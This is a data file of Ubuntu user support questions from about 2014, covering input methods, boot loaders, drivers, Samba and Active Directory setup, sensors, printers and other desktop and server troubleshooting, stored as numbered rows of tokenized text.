497149	sanskrit language typing help , ubuntu-14	i had taken the following steps with ubuntu-12 and it had worked perfect . but on a new laptop , i installed ubuntu-14 and i am not getting access to itrans conformant typing or transliteration scheme for the sanskrit language . ubuntu-14 gives me access to hindi language 's bolnagri and wx schemes and sanskrit language 's kagapa phonetic , but these schemes are new to me ; and i know for fact that 15-20 years ago itrans conformant typing was the norm and it was available with ubuntu-12 . so why this new change , which is perhaps not for the better ? how can i add to ubuntu-14 what was the default for sanskrit lang under ubuntu-12 ? system settings > language support > install/remove languages i added sanskrit and hindi at the step above . then i checked under : text entry settings > input sources to use > and i only see options like kagapa phonetic , bolnagari et al . i would like my ubuntu-12 setting back . i do not remember the technical name for that transliteration scheme for sanskrit lang typing support to dev-nagari script . please advise . i hope this is the correct place where to ask for this help .
497150	how to build eglibc in debug mode	i am trying to create a debug version of the eglibc to allow step by step debugging in a program that crashes in the eglibc . i want the created `` .so '' file to be as close as possible to the eglibc that comes with my version of ubuntu ( 14.04 x64 ) ( with the same options , patches , etc . ) with the exception of the debugging facilities . so far i am having a hard time finding an exact procedure to do that . it is becoming frustrating and time-consuming , so would anybody be kind enough to provide that procedure to me , please ?
497155	battery life in lenovo e430	i installed ubuntu 14.04 lts on lenovo thinkpad e430 . the computer is brand new and i had windows 8 installed before . in windows 8 battery life for ordinary use was about 3 hours , but in ubuntu it decreased to less than one hour . is there any solution for this ?
497157	xfce : how do i get standard norwegian keyboard layout with dead keys ?	in xubuntu 's keyboard layout settings , if i choose `` bruk systemstandardene '' ( use system standard ) for my keyboard layout , i get the norwegian `` no '' layout with deadkeys ( same as setxkbmap no it seems ) . the key to the left of backspace gives me \ , but with shift it gives a dead `` ` '' . but if i want several keyboard layouts , there 's only norwegian without dead keys in the list ( while e.g . mac and northern saami variants both have with and without-versions ) : is this a bug ? where 's norwegian `` no '' with dead keys ? it 's obviously on my system since it 's the system standard .
497159	needed simple script/loop/command for input command , execute and output within textfiles	suppose i have list of commands in text file as below ( cat cmdlist.txt ) : - cut lshw top awk sensors now i want to get simple information on that command by whatis cut , whatis lshw etc . respectively and print these out-put of whatis < commadnd > in text file say cmdinfo.txt desired output of cmdinfo.txt ( cat cmdinfo.txt ) : - cut ( 1 ) - remove sections from each line of files lshw ( 1 ) - list hardware top ( 1 ) - display linux processes awk ( 1 ) - pattern scanning and text processing language sensors ( 1 ) - print sensors information how do i achieve cmdinfo.txt file with output of whatis for commands from cmdlist.txt respectively ? this is only sample txt files . suggest simple script if needed .
497167	need to backup messages nokia 501	i need to connect my nokia asha 501 to pc . the nokia ovi suite / nokia pc suite for windows/mac does not support my phone . is there a software avilable to **backup my message**s in my nokia asha 501 ?
497173	how to run thunderbird on startup , minimised ?	how can i set thunderbird to launch automatically in the minimised or hidden-in-launcher state ? first component of problem is starting it . i do not know which 'command ' is needed . second component of problem is keeping it minimised , or hidden from launcher ( given that it 's unlocked from launcher ) .
497174	how to set the speed of a single mouse click	if you do a slow single click on a unit launch icon or a menu item in the taskbar ubuntu interprets this as a move rather than an open command . i would like to increase the time threshold at which an open becomes a move . the mouse setting allows the setting of the double click speed , how do i set the single click speed ? terry
497175	is movie gear avilable for ubuntu ?	back in windows i have used movie gear to crate gif files . i would like to know wheather it is availble in ubuntu . if not please list out similar softwares .
497178	how to regenerate vala api file on my own ?	i made some changes for gtk+-3.0 . i want to regenerate the gtk+-3.0.vapi file automatically ( not by hand ) . i had already researched the vala document but i did't find right way . the vala version is 0.24 and im using ubuntu12.04 lts . anyone could help ?
497184	how would i think of this solution ?	i recently encountered a problem while using wubi to install ubuntu 14.04 from within windows 7 , and i found a great solution here . i could have never figured that out by myself , though . where would i begin reading / learning in order to develop the knowledge needed to understand that solution and to be able to think of it myself ?
497186	it 's allready possible to install ubuntu in my samsung galaxy gt-s5300 ?	i would like to install ubuntu in my samsung galaxy gt-s5300 in order to have ubuntu in my andoroid cell phone . i wonder if it 's allready possible in '14 july .
497190	issues playing one certain dvd	i have 2 home made dvd that a friend gave me . it has videos she has rights to redistribute for a church ministry . and i am not sure , but i think they might be using one of those stand alone dvd copiers you see in magazines in order to make copies really fast ( ish ) . the dvd is named `` dvd_video_recorder '' and the only file that i see is called `` video_ts '' and shows as unknown filetype , and 0 bytes in size . this dvd plays fine in my xbox 360 , and this linux computer can play other dvd 's fine , restricted or otherwise , but for some reason the dvd 's she is giving me wo n't do anything with any of my video players , nor with handbrake . does this sound familiar to anyone ? ? i have 2 dvd 's with non-copy righted videos on them and i would really like to back them up for personal use . but ca n't seem to figure this out . thank you for any help and god bless you guys , daniel edit here is the only messages vlc shows me . i will try to talk to my friend soon to ask what she uses to make these copies . there was one dvd she gave me that worked fine and normal . i was able to backup with handbrake no issues . so something must have changed on her end .
497191	i need help uninstalling ubuntu please help	i want remove ubuntu . is there any chance that i may make a bootable usb . or a easy and safe way to remove ubuntu .
497192	how to set up a video call call using empathy and google+	i 'm trying to set up a video call between a lenovo z580 laptop and a samsung ace 2 android smart phone using google+ . the laptop is running ubuntu 14.04 with empathy and the phone is using hangout . i can set up an im conversation despite the fact that empathy says the phone is off-line ( small yellow triangle ) . the empathy help file says click on the tiny round icon ( might be a camera but it 's not clear what it is ) . i ca n't do that as there is no icon . if i click the camera icon in hangout the phone appears to be calling the laptop , but nothing happens on the laptop . so how do i set up a video call call using empathy and google+ ? terry
497193	ubuntu 14.04 very slow with virtualbox on windows 7	host os : windows 7 guest os : ubuntu 14.04 virtualbox 4.3.12 installed vbox guestaddition if 3d acceleration is enabled , then vbox manager stops working . without 3d acceleartion enabled , ubuntu is very slow . i have ubuntu 10.04 which works fine on the same machine .
497196	my-weather-indicator has stopped working	my-weather-indicator has stopped working after i filled in a second location although did fine before that . no options - settings are given at right click of mouse . can someone please tell me how to repair it ?
497197	bluetooth on acer aspire e1-572g under ubuntu 14.04 : no device found	i am quite new to ubuntu so i was surfing on this forum but did n't find a real answer to my question , which is : when bluetooth is on and i try to pair any device , the search does n't list any result and even if my laptop should be visible , i ca n't see it on other devices like smartphones . is there a way to fix this ?
497199	is there a setting to turn off the dialog box when making screenshots ?	according to this , pressing the screenshot hotkey will do either of 2 things : for unity users , it 'll open the dialog box where you can set the picture 's name , location and whether or not it 'll be copied to clipboard instead . for gnome users , it 'll automatically save the picture with a name that shows time and date taken to the set autosave folder ( ~/pictures by default ) . i 've been using gnome-flashback ( formerly known as gnome classic ( no effects ) or gnome fallback ) for a long time and have had the second outcome happen every time . for some reason , though , after upgrading to 14.04 and switching unity to gnome-flashback , it started doing the first one instead . following this to make custom keyboard shortcuts does n't work because gnome-screenshot still uses the dialog box by default . i 've already set the autosave location and the screen flash + shutter sound is enough of an indication that a shot 's been taken so no need to argue pros and cons like all the bug reports that do . is there a setting or some way to disable the dialog box from appearing while trying to keep ubuntu light by not having to install more things as much as possible ?
497202	apache status suddenly stops	i have a problem with my apache , i am running ubuntu server 12.04 on a vps . i have a basic lamp stack , my problem is this , every few days apache will just stop and i will just notice this if i checked my blog . i do n't have any problems like this before , i was using apache 2.2 before and currently i have apache 2.4 . i already reinstalled apache and i thought everything was okay , but right now it just happened again and my website was down , i do n't know how long it was til i noticed that apache had stopped . any suggestion that could help me sort this thing out ? thank you very much lamp information : apache 2.4.9 php 5.5.14 mysql 5.5
497203	how to install ubuntu on android phone ( htc one x )	i want to install ubuntu on android device . the detail of my handset is as under : - htc one x htc sense version - 5.0 ram 1gb processor - quadcore ... where can i find ubuntu os for my android htc one x ? and can i go back to my android if something go wrong thanks
497204	why does `` sync '' for a ntfs usb stick take forever ?	i have a large usb stick that i formatted ( under windows 7 ) to ntfs . ( fat32 does not support files > 4 gb ; and exfat does not allow me to create linux links on the file system ) copying forth and back to the usb stick under linux works fine ; but when i select `` eject '' ; or run `` sync '' on the command line , it seems to take forever ... is there anything that i can do to speed up things ? [ this is xubuntu 14.04 ]
497208	lm-sensors issues with sensors	when i configure any machine with ubuntu i setup lm-sensors to work , i have one machine in my house that before was with ubuntu 12.04 , but it had a problem , than i had to reinstall ubuntu , so i 've decided to install ubuntu 14.04 , i 've setup the sensors as the official page says https : //help.ubuntu.com/community/sensorinstallhowto ( this is how i do every time ) . well , before of reinstalling it was appearing all this data below . /etc/mrtg/cfg/mrtg-scripts $ sensors adt7490-i2c-0-2e adapter : smbus i801 adapter at f000 in0 : +1.12 v ( min = +0.00 v , max = +3.31 v ) vcore : +1.09 v ( min = +0.00 v , max = +2.99 v ) +3.3v : +3.25 v ( min = +2.96 v , max = +3.61 v ) +5v : +5.03 v ( min = +4.48 v , max = +5.50 v ) +12v : +11.90 v ( min = +0.00 v , max = +15.69 v ) in5 : +2.10 v ( min = +0.00 v , max = +4.48 v ) fan1 : 1312 rpm ( min = 0 rpm ) fan2 : 0 rpm ( min = 0 rpm ) fan3 : 0 rpm ( min = 0 rpm ) fan4 : 0 rpm ( min = 0 rpm ) temp1 : +38.5°c ( low = +5.0°c , high = +65.0°c ) ( crit = +70.0°c , hyst = +66.0°c ) m/b temp : +39.8°c ( low = +5.0°c , high = +65.0°c ) ( crit = +70.0°c , hyst = +66.0°c ) temp3 : +42.2°c ( low = +5.0°c , high = +65.0°c ) ( crit = +70.0°c , hyst = +66.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +59.0°c ( high = +74.0°c , crit = +100.0°c ) core 1 : +55.0°c ( high = +74.0°c , crit = +100.0°c ) core 2 : +55.0°c ( high = +74.0°c , crit = +100.0°c ) core 3 : +57.0°c ( high = +74.0°c , crit = +100.0°c ) radeon-pci-0100 adapter : pci adapter temp1 : +60.5°c this was at 12.04 , now it 's not showing the adt7490-i2c-0-2e chip , i 'm searching about this problem but i did n't found any that can help me . a important info is , before reinstalling ubuntu i 've updated bios to solve a problem with kingston 1666mhz memory modules that my dp45sg intel motherboard has . to append more info , i 've checked that in hardware monitoring health information at the bios , all the temperatures , fan speed and voltages are showing normally . bios version : sgp4510h.76a.0125.2010.0121.1927
497210	problem with x11vnc in xubuntu / multiple windows	i configured a vnc server with x11vnc and i can connect to it from tightvncviewer . however , i get multiple windows as in the picture what option do i need to correct this ? i 'm using xubuntu 14.04 .
497211	adobe dreamweaver license in ubuntu	does adobe dreamweavercs5 running in ubuntu require a license activation or not ?
497213	how to get background sound work in recordmydesktop	i can not get any sound recordmydesktop by sound i mean the background song or video volumes which are ongoing in my desktop i have a video of what i am doing to get sound but eventually not getting it its over here
497215	displaying an html email with apple-inline img tag ?	when i receive an html email from a mac user that includes an inline image like the following , the image does not display when i render the html ( in chrome , firefox , etc. ) . < img apple-inline= '' yes '' id= '' 21142eac-5ee0-4297-b3d5-e97ab1ff39dc '' height= '' 167 '' width= '' 188 '' apple-width= '' yes '' apple-height= '' yes '' src= '' cid:1408e1b5-019f-41bd-bd66-c1a8451aac49 @ nc.rr.com '' > how do i make it render ? i 'm using ubuntu 14.04 . thank you .
497218	problem when installing realpaver-0.4 in ubuntu 14.04	i have installed ubuntu 14.04 using virtualbox on my system . for my work , i wanted to install realpaver optimization software on ubuntu . according to the installation instructions , i unpacked and then ran the command ./configure in the terminal . unfortunately i encountered to this configuration error : ... checking build system type ... x86_64-unknown-linux-gnu checking host system type ... x86_64-unknown-linux-gnu ./configure : error : sorry ./configure : line 5199 : exit : this : numeric argument required ./configure : line 5199 : exit : this : numeric argument required the software in question is : realpaver-0.4 , an optimization software which i downloaded from here , and i 'm using the 64-bit version of ubuntu . can anyone help to solve this problem ?
497220	sd card reader only works if card is inserted during boot	i 'm trying to get the realtek rts5229 sd card reader to run on my newly installed system . i installed linux-firmware-nonfree to get the driver for the rts5229 sd card reader , according to my other question on this topic . however , the card reader only works if a sd card is plugged during boot . when i plug it after boot , there is n't any device file and the udev monitor does n't show anything when ( un- ) plugging the card . also , lshw shows unclaimed at the device 's entry . i already tried the following : purging and reinstalling linux-firmware-nonfree insert mmc_block , rtsx_pci and rtsx_pci_sdmmc into /etc/modules and ran update-initramfs -u searched for another solution - > gentoo forums , but suggested kernel config already set read dmesg | tail after card was inserted after boot - > [ 626.100472 ] pciehp 0000:00:05.0 : pcie04 : card present on slot ( 0-2 ) read udevadm monitor - > add/remove events fired when plugged at boot time , no events when not . what is the problem and how can i resolve it ? please ask for further information if needed . edit : is there at least the possibility to run echo `` 1 '' > /sys/bus/pci/reload when a card is inserted ( when the kernel posts the `` card is present '' message to /var/log/kern.log )
497222	detect wether machine is 32 or 64 bits	i want to install ubuntu 14.04 on my laptop and it has amd e2 vision processor i do n't know know if my machine is 64-bit or 32-bit so i am having confusion downloading the ubuntu version ( 64 or 32 bit ) can anybody help ? ?
497229	how do i export a database in ubuntu to specified location using terminal	i get a blank screen since i have installed the ati graphic drivers . i tried a lot of things restore my laptop but all in vain . only formatting seems to be the other option . so i want to export my databases to a specified location i.e /media/mount/d using the terminal . how do i do it ..please help me out .
497231	snmp mibs missing disks ucd-snmp-mib	using snmp with ubuntu 14.04 i realized that when i use snmpwalk or get to the mib diskpath it return me only 12 mibs at maximum as listed below , one is missing because i umounted , but i have more disk/partitions was listed after the snmpwalk . ucd-snmp-mib : :dskpath.1 = string : / ucd-snmp-mib : :dskpath.2 = string : /var ucd-snmp-mib : :dskpath.3 = string : / ucd-snmp-mib : :dskpath.4 = string : /sys/fs/cgroup ucd-snmp-mib : :dskpath.5 = string : /run ucd-snmp-mib : :dskpath.6 = string : /run/lock ucd-snmp-mib : :dskpath.7 = string : /run/shm ucd-snmp-mib : :dskpath.8 = string : /run/user ucd-snmp-mib : :dskpath.9 = string : /boot ucd-snmp-mib : :dskpath.10 = string : /mnt/data ucd-snmp-mib : :dskpath.11 = string : /mnt/connor pydf output filesystem size used avail use % mounted on /dev/pitcairn -- vg/root 47g 2433m 42g 5.1 [ # ... ... ... ... ... ... ] / /dev/sda1 235m 36m 187m 15.3 [ # # # ... ... ... ... ... . ] /boot /dev/sdb1 466g 79m 466g 0.0 [ ... ... ... ... ... ... . ] /mnt/app /dev/sdc1 466g 11g 455g 2.3 [ ... ... ... ... ... ... . ] /mnt/backup //connor.codex/files 124m 14m 110m 11.1 [ # # ... ... ... ... ... .. ] /mnt/connor /dev/pitcairn -- vg-lv-/disk 402g 70m 382g 0.0 [ ... ... ... ... ... ... . ] /mnt/data /dev/sdd1 932g 288g 644g 30.9 [ # # # # # # ... ... ... ... . ] /mnt/storage how can i graph these disk that dont appear when i use snmpwalk ?
497235	problem with se-toolkit cloning website	i have been trying to do some things on se-toolkit and when i clone a website it says ; [ ! ] apache may be not running , do you want set to start the process ? [ y/n ] : y [ ... . ] starting web server : apache2httpd ( pid 11995 ) already running . ok apache webserver is set to on . copying over php file to the website . please note that all output from the harvester will be found under apache_dir/harvester_date.txt feel free to customize post.php in the /var/www directory i ca n't locate /var/www any ideas ? thanks ps : im on vmware
497239	efi dual boot windows 8.1 and ubuntu 14.04	i have installed ubuntu 14.04 lts in a dual-boot config with windows 8.1 following the tutorial : http : //ubuntuforums.org/showthread.php ? t=2227580 ( i added an ext4 /home partition . ) even after step seven , write bcdedit /set { bootmgr } `` path\efi\ubuntu\shimx64.efi '' in the terminal my pc will not show me a boot menu : windows boots automatically . i ran the command sudo efibootmgr -v and these is the output .
497241	unable to boot to windows after installing ubuntu	i purchased new hdd and installed ubuntu in it as i did n't had windows recovery disk available at that time . now i have recovery disk for windows 7 , so i installed it . and after finishing of installation a reboot was requested by system . after rebooting , instead of getting a selection menu for operating systems it directly started ubuntu . please help solving the error . i already have important data from ubuntu on external drive so i wish to completely remove ubuntu and switch to windows . i do n't know linux much . please help ! !
497242	moving files to truecrypt encrypted hdd hangs	i 'm trying to move several files to an external hdd . the hdd is encrypted with truecrypt . everything works fine until i start moving the files over there . the progress bar moves up to around ~500mb . after this point the whole computer freezes and i have to shut it off using the powerbutton . i had this problem when i started using ubuntu and needed to move all my files from the computer on to the hdd as backup . i was n't able to do it on a encrypted hdd so i used a normal one and then forgot about the problem , since i thought it 's an issue with the livecd . now i 'd like to keep this hdd encrypted , but still need to move the files ( > 36gb ) .
497245	samba share not accessible with ad user	i try to install a samba server for active directory authentication and shares . i managed to configure kerberos ( kinit klist works ) i configured smb.conf . wbinfo -u wbinfo -g getent group *showing all domain groups ) getent users ( showing all domain users ) net join was successful modifing nsswitch and common-session did work as well . i can log into the machine using ad credentials , locally and over ssh . even adding domain administrator group to sudoer worked . so i assume the authenication is configured correctly . i now wanted to create a share . one with [ homes ] and one with access for an ad group . if i now connect to the share from a win7 computer i get prompted user/password . if i enter the data from the initial local account , that was created during the installation process , i see both shares . the public one and the home directory of the local user . if i use the ad credentials , i only get access denied . i even tried to enable guest access and deactivation any access control . but nothing changes . the local user can connect , but the ad user does n't even get to see the shares . if i enable logging level 10 i see that the computer is trying to authenticate , but failes . what am i missing ? [ update ] i found the problem . i do n't really understand why that caused that effect , but now the share is working nearly as i want it to . i did use idmap uid = 10000-20000 idmap gid = 10000-20000 from the tutorial at http : //wiki.ubuntuusers.de/samba_winbind i did n't think the warning , that these lines are deprecated will cause problems , as deprecation normally means still supported . that 's true for local login . but shares get broken . i replaced these two lines with idmap config * : range = 10000-20000 and now the share is working . only problem left is , in order to connect to the [ homes ] share i need to use computername\username , but i wanted homes to work with domain\username ? if anyone knows how to change that it would appreciate it , but as i can just use a normal home share with username subdirectory , i do n't consider that a real problem . [ update 2 ] sometimes you ask and find the solution the next day . in the case someone has the same trouble as i had , here are my config files that now work . i replaced the windowsserver with server and the domain with domain.local krb5.conf : [ logging ] default = file : /var/log/krb5.log [ libdefaults ] ticket_lifetime = 24000 clock_skew = 300 default_realm = domain.local dns_lookup_realm = true dns_lookup_kdc = true [ realms ] domain.local = { kdc = server.domain.local:88 admin_server = server.domain.local default_domain = domain.local } [ domain_realm ] .domain.local = domain.local domain.local = domain.local .domain.local = domain.local domain.local = domain.local smb.conf : [ global ] security = ads realm = domain.local workgroup = domain idmap config * : range = 10000-20000 server string = linuxserver winbind enum users = yes winbind enum groups = yes winbind cache time = 10 winbind use default domain = yes winbind nested groups = yes template homedir = /home/ % u template shell = /bin/bash client use spnego = yes ntlm auth = yes lanman auth = no client ntlmv2 auth = yes encrypt passwords = yes restrict anonymous = 2 domain master = no local master = no preferred master = no os level = 0 map to guest = bad user guest account = nobody unix extensions = yes valid users = @ dom채nen-benutzer [ homes ] comment = userdirectory browseable = no valid users = % s , domain.local\ % s writeable = yes create mode = 0600 directory mode = 0700 [ home ] comment = userdata path = /data/home/ % u browsable = no valid users = % u writeable = yes create mode = 0600 directory mode = 0700 [ data ] comment = data path = /data/h writeable = yes valid users = @ dom채nen-benutzer create mode = 0660 directory mode = 770 it 's working and i 'm happy now : )
497246	fan not working increasing cpu temperature	i have dell vostro 1014 laptop . i am using ubuntu 12.04 lts . the fan of my laptop is not working anymore and increases the cpu temperature upto 85 degree celsius . i followed the solution given on this link . now after running $ sensors , output is anuj @ anuj-sharma : ~ $ sensors acpitz-virtual-0 adapter : virtual device temp1 : +74.5°c ( crit = +102.0°c ) coretemp-isa-0000 adapter : isa adapter core 0 : +72.0°c ( high = +105.0°c , crit = +105.0°c ) core 1 : +74.0°c ( high = +105.0°c , crit = +105.0°c ) i8k-virtual-0 adapter : virtual device right fan : 0 rpm cpu : +74.0°c note the right fan : 0 rpm cpu temperature increases upto 85 degree . how can i make the fan working ? by checking using psensors , it is running at an interval of 4-5 minutes for 1-2 seconds and again stops . have google a lot but did n't get any answer working for me .
497250	where is groff formatter ?	i am a new ubuntu user . my default text formatter on windows is wingroff , a gnu roff port . i have installed the complete ubuntu system from the 14.04 install disk , but i can not locate groff : not on the default installation nor on the ubuntu listing of downloadbale packages . how can i install it ?
497253	amd / intel switchable graphics problem in ubuntu 14.04	i am trying to install ubuntu on a lenovo g500 , cpu is intel core i3-3110m , 4gb ram , and as you can guess , dual graphics : intel hd 4000 for the basic stuff and amd radeon hd 8570 for the good stuff . i went through the installation without problems , but when i try to boot the system fails : initially i get a message that the screen , graphics adapter and keyboard/mouse could not be automatically configured . i have tried installing fglrx through apt and from amd 's proprietary drivers . i then installed xfce as well . through some testing , i have realized that whenever i try to use x11 , it gets stuck with the aforementioned message . i can then go into the commandline and delete the xorg.conf files from /etc/x11 . after this , i am able to arrive to the logon screen . when i try to log in everything freezes up ( with the unity interface ) . i successfully pass through the authentication , but then nothing happens . occasionally there are some popups saying that there have been system errors and prompting me to report them , but nothing else . if i try to use an xfce session , it works just fine . why can i not access unity ? in xfce , i tried to install the catalyst control center in order to deactivate the amd card as i need the battery life . however , as soon as the packages are installed , it reverts to the error message ( gui could not be configured , the system is running in low graphics mode , blah blah blah ) . what i noted today is that by running the command lspci i see the intel gpu as a vga adapter , while the amd device is listed as a screen adapter ( no vga ) . perhaps it has something to do with this . if anyone has any idea or hint , it would be most appreciated . another thing is that i did this to another laptop with switchable graphics , a samsung with intel hd 3000 and amd radeon hd 8750 , and it works perfectly fine . as soon as i installed the proprietary drivers , i was able to execute ccc and set it up to use the intel vga only .
497254	video tearing ubuntu 14.04 ati	i 'm running ubuntu 14.04lts and i 'm getting video tearing ( top , bottom , mid , it 's horrible ) on videos ( mplayer , youtube , moving windows around ... ) . my graphics adaptor is an ati amd radeon hd 6700m series . it happens regardless of the driver i install . tried all the following drivers : xorg default , ati proprietary , catalyst 14.4 ( did n't work at all ) and catalyst 14.6 beta ( using this one now ) . i already tried many different fixes i found online during this week , but nothing seems to work . gaming , for instance , does not get affected as far as i can notice . my ccc does n't show the 'anti tear ' option . i read somewhere that it 's due to dual graphics card being present ( intel/ati ) . does anybody have a clue how to fix this ? thanks ! ! !
497255	sync thunderbird configs across computers	i sync my thunderbird profile folder with owncloud so that i can have the same configs across all my computers . because of the size of the folder , data sometimes get corrupted or version conflict.. does anyone have a better solution ? the important part i would like to sync is mail accounts config and calendars , mails can sync naturally by imap .
497257	triple booting on ubuntu	i have windows 8 , windows 7 and ubuntu x86 installed on my pc . when i boot , grub2 comes up so i can boot . i want to uninstall windows 8 but keep windows 7 . how would i do this without breaking my system ? edit : i use the windows 8 bootloader to boot windows 7 .
497260	chrome browser problem in xubuntu 14.04	i installed xubuntu 14.04 and when i downloaded and installed google chrome after updating database chrome gets fonts like this :
497264	how do i install this gnome theme ?	i ca n't seem to find the answer to this ... i downloaded a theme from http : //gnome-look.org/content/show.php/glassy+matrix ? content=51232 . this http : //gnome-look.org/content/show.php/glassy+matrix ? content=51232 this is the theme i want , when i download it , it does n't see , to have a file extension , and its a bin file . how do i do this ? it says that the file is an unkown file type . how do i install this theme ?
497265	my game on steam [ pol ] requires internet explorer 9	i am trying to play a game on steam that requires internet explorer 9 . is there any way to do this on playonlinux . i 've tried to make a non-listed install on pol , but steam afterwards does not detect it . any suggestions ?
497267	how to update converseen ?	i have been informed by the program that it needs an update but have no idea how to do this . i have only installed ubuntu this morning and have managed just about everything else but i am stumped with this one . i have got a install file and it says this ... to compile converseen you need qt4 , magick++ development libraries , cmake and the gnu c++ compiler . download converseen , extract the archive content , enter directory and build the executable using these commands : tar -xvf converseen_0.x-tar.bz2 cd converseen_0.x mkdir build cd build cmake .. make su make install
497271	windows boot option gone ?	so i have had windows 8.1 and ubuntu running side-by-side for the last couple of months , and both on separate hard drives . today i turned on my computer and the option to boot into windows was gone , but i can see the the windows 8 hard drive , and all the data on it . so my question is , how to i fix grub to allow me to boot back into both ubuntu and windows ? by the way sorry if this is a duplicate , i searched and could n't find anything , so if it is , just point me to the link and i will close the question .
497273	sound coming after stopping rythmbox	i was playing songs for approx . 25 mins and meanwhile i was working with too many pacakges like torrent downloader , eclipse , firefox , file browser and some other apps when i stopped rythmbox it did n't stop instead when i restarted it two diffrent rythmboxes were playing simultaneously after closing one of them ( which i could reach ) was closed but the previous one which can not be seen but heard is still playing till now what to do how to stop it ? i have tried ps aux | grep rhythmbox but no rythmbox is active
497276	wireless printing through zte network device not working	i am a beginner to linux , having recently installed ubuntu 14.04 on my dell inspiron 1525 alongside win 7 . i have a samsung scx 4521f multifunctional usb printer and a zte zxv10 h201l network device . the latter is an adsl modem + wifi router with a usb slot where u can attach a usb printer or a usb storage device . in ubuntu 14.04 , however , the system doesn t recognize my printer that is attached to the zte network device . i click on system settings - > printers - > add but it doesn t show up among network printers . neither do i get anything even if i click on `` find network printer '' . ( the internet share through wifi does work , though . ) in win 7 the whole made no problem , so i could practically convert my usb printer to a network printer by connecting it to the zte network device . could i somehow get it work in ubuntu 14.04 ?
497280	how can i play asx files from chrome ?	is it possible to play asx files from google chrome on ubuntu 14.04 ? i am trying to play this station , but without any success . instead of streaming the station , an asx file is downloaded . however , the file is played flawlesly from the browser when i use windows . how can i fix that ? please , note that i am not searching for an answer like , `` switch to firefox '' or `` open an external application to play that file '' . also , i have ubuntu-restricted-extras installed .
497281	dual-boot issue ( and much more ... )	i downloaded today and installed the 64-bit version of ubuntu 14.04 something , and i installed it via live cd . all went well , i created a partition of 150gb and another one of 508mb ( the latter for the swap space ) and when i restarted the pc it automatically booted to ubuntu , it didnt ask for which os to boot to . i booted to ubuntu alright , but noticed that it wasnt working properly - the mouse lags and leaves trails of itself , typing had a delay - and so i figured that i shouldnt have installed the 64-bit version cause i have 4gb of memory . i tried downloading the boot repair tool by typing in the terminal : sudo add-apt-repository ppa : yannubuntu/boot-repair but i received an error saying something like : can not locate /cow in grub . i googled it but could n't find anything . then i typed : sudo update-grub and it did find my win7 installation . next time i rebooted i was prompted which os to boot from and i chose the win7 loader . all went well and there i was at my windows . i then proceeded in formatting the disk partitions that were used by ubuntu , but then when i rebooted there was an error on the screen saying that there is no bootable device . i rebooted and pressed f12 to access the boot options and i found 2 of them , one with the tag p0 and one p1 . i tried both of them , the first one redirected me to the previous message , whereas the 2nd one redirected me to a message saying : grub rescue > i had no idea what to do , so i re-installed the ubuntu os from the cd and ran the update-grub command again ( boot-repair still did n't work ) . now i get prompted each time which os to boot , but my ubuntu installation does not work . when i choose ubuntu , i get a black screen with some trails of colour on the top and nothing happens from there on ( i left it like that for 15 mins so i guess nothing will happen after that ) . what i wish to do is delete ubuntu and always boot windows . feel free to ask any details .
497287	hp deskjet 1515 all in one printer not detecting by hplip toolbox	i started using ubuntu before 2 months only . my printer is hp deskjet ink advantage 1515 all in one printer . i have already installed hplip . i connected the printer through usb port . but the hp device manager not detecting the device . some body please help me . eleena @ eleena-desktop : ~ $ sudo apt-get install hplip [ sudo ] password for eleena : reading package lists ... done building dependency tree reading state information ... done the following packages were automatically installed and are no longer required : gir1.2-gconf-2.0 appmenu-gtk linux-headers-2.6.32-21 nvidia-settings python-lxml appmenu-qt linux-headers-2.6.32-21-generic dkms cups-pk-helper libvdpau1 appmenu-gtk3 gir1.2-panelapplet-4.0 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : printer-driver-postscript-hp suggested packages : hplip-gui system-config-printer the following new packages will be installed : hplip printer-driver-postscript-hp 0 upgraded , 2 newly installed , 0 to remove and 0 not upgraded . need to get 861 kb of archives . after this operation , 1,565 kb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //in.archive.ubuntu.com/ubuntu/ precise-updates/main hplip i386 3.12.2-1ubuntu3.4 [ 85.1 kb ] get:2 http : //in.archive.ubuntu.com/ubuntu/ precise-updates/universe printer-driver-postscript-hp all 3.12.2-1ubuntu3.4 [ 776 kb ] fetched 861 kb in 28s ( 30.2 kb/s ) selecting previously unselected package hplip . ( reading database ... 235335 files and directories currently installed . ) unpacking hplip ( from ... /hplip_3.12.2-1ubuntu3.4_i386.deb ) ... selecting previously unselected package printer-driver-postscript-hp . unpacking printer-driver-postscript-hp ( from ... /printer-driver-postscript-hp_3.12.2-1ubuntu3.4_all.deb ) ... processing triggers for man-db ... processing triggers for cups ... setting up hplip ( 3.12.2-1ubuntu3.4 ) ... creating/updating hplip user account ... setting up printer-driver-postscript-hp ( 3.12.2-1ubuntu3.4 ) ... eleena @ eleena-desktop : ~ $ hp-setup hp linux imaging and printing system ( ver . 3.12.2 ) printer/fax setup utility ver . 9.0 copyright ( c ) 2001-9 hewlett-packard development company , lp this software comes with absolutely no warranty . this is free software , and you are welcome to distribute it under certain conditions . see copying file for more details . got bus address : `` unix : abstract=/tmp/dbus-1biisulszn , guid=98e2b27cef3913f43b51c2430000002d '' connected to accessibility bus at : `` unix : abstract=/tmp/dbus-1biisulszn , guid=98e2b27cef3913f43b51c2430000002d '' registered dec : true registered event listener change listener : true searching ... ( bus=usb , search= ( none ) , desc=0 ) error : no devices found on bus : usb
497292	where is my `` xubuntu desktop '' ?	i am using xubuntu 14.04 for some weeks now . today i did some kind of `` hard shutdown '' - i `` ejected '' an usb stick ... and that took ages ; and as i didnt care about the stick content ; i ran `` shutdown '' ; but the whole system hang ; so i finally pressed the power button on my laptop . now my xubuntu comes up ; i can login ; all applications behave normally ; but it seems that something happened to `` thunar '' and/or my desktop . all the icons are gone ( although i have files in my desktop directory ) ; and right click on the desktop does not start the typical menu . i already re-installed all thunar related packages . there are no errors in the .xsession-errors ; any idea how to fix this ; or where to look for log files ?
497294	need help installing ubuntu 14.04	i am a complete linux noob . i burned the latest ubuntu iso to a dvd and tried to install it from the disk . my original intention was to install it alongside my windows , but somehow i ended up creating a new partition table . when i realized i had gone past the option to install alongside i pressed back and chose the option and clicked install . the installation was almost finished and then i get the error number 5 ( errno 5 ) saying hard drive or disk may be faulty so i decided to reboot my computer . but now if i do n't boot from the `` faulty '' disk , my computer wo n't boot at all : it will just be a black screen . i keep getting the errno 5 error no matter how i try to install . i hope someone can help me .
497298	good video editing software ?	im looking at video software . im not sure what else to do ? i use to run cyberlink but cant since im running the latest version of ubuntu . what are my options ?
